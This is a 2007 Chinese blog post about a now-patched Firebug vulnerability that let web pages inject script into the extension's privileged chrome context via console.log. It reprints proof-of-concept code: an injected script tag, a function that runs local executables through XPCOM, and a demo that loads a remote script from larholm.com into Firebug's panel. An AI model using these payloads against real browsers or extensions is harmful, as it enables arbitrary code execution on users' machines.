Firebug Goes Evil(firebug1.0.3之前的安全隐患)
URL:http://blog.iyi.cn/start/2007/04/firebug_goes_evilfirebug103.html
firebug是非常好的javascript调试工具,确切的说是为网页调试工具,我现在已经离不开firebug了~
但是事情往往是双向的,firefox是非常好的浏览器,正因为它灵活丰富的扩展,和本身的安全性。但扩展却带来了安全隐患。因为开发扩展的人,一般不会把太多精力放到安全问题上面。firebug就是个例子!
今天在swik上逛荡,无意间看到一个标题:Firebug Goes Evil
Attackers can call console.log a few times to spawn any file they want or even silently install browser extensions, not to mention that they will be able to read and write the file system too. The possibilities for evilness are endless.
作者说:
攻击者可以通过反复调用console.log来生成文件甚至可以安装浏览器扩展,说不定还可以读写系统文件!。作者还给出了一个演示脚本,不幸的是,我的firebug在昨天已经更新到1.0.5,这个漏洞已经修复了。
console.log({'<script>alert("bing!")</script>':'exploit'})
还有一段更复杂的代码,号称可以执行本地的可执行文件:
function runFile(f) {
var file = Components.classes["@mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile);
file.initWithPath(f);
var process = Components.classes["@mozilla.org/process/util;1"]
.createInstance(Components.interfaces.nsIProcess);
process.init(file);
var argv = Array.prototype.slice.call(arguments, 1);
process.run(true, argv, argv.length);
}
从作者的评论中,我又看到一篇相关文章:
http://larholm.com/2007/04/06/more-0day-in-firebug/
作者larholm之前还发表了一篇类似的文章:
http://larholm.com/2007/04/06/0day-vulnerability-in-firebug/
文章详细的分析了firebug的漏洞原理,并给出了以个演示代码:
<script type="text/javascript"> // A function that returns a specially formatted string function vulnstring(){ return 'function <b style="font-size:80px">foo(<script src="http://larholm.com/vuln/firebuginclude.js"></'+'script>) { }'; } // The function object to log with Firebug var a = function(){}; // Overwrite the default toString method a.toString = vulnstring;// Attempt to trigger the vulnerability if Firebug is installed and has console logging enabled
if(typeof console!="undefined" && typeof console.log=="function")
console.log(a);
</script>
该段代码会自动嵌入作者一个模拟的攻击网页(当然这个页面并没有攻击性),并弹出一句提示:“yay I was injected in chrome://firebug/content/panel.html”
firebug的作者在文章的最后回复:
I have fixed this issue and and released 1.04.As you suggested, I now escape all text before inserting it into HTML, rather than leaving it up to the caller. I’ve also added support for disabling file: urls.
I hope there aren’t any more vulnerabilities to be found, but if there are, please give me a day to patch it before you publish. I do appreciate you taking the time to make Firebug more secure, but it’s better for everyone to have the patch surface before the exploit.
It is a good think that Firefox has an automatic update system, so every Firebug user should be secured within a few days.
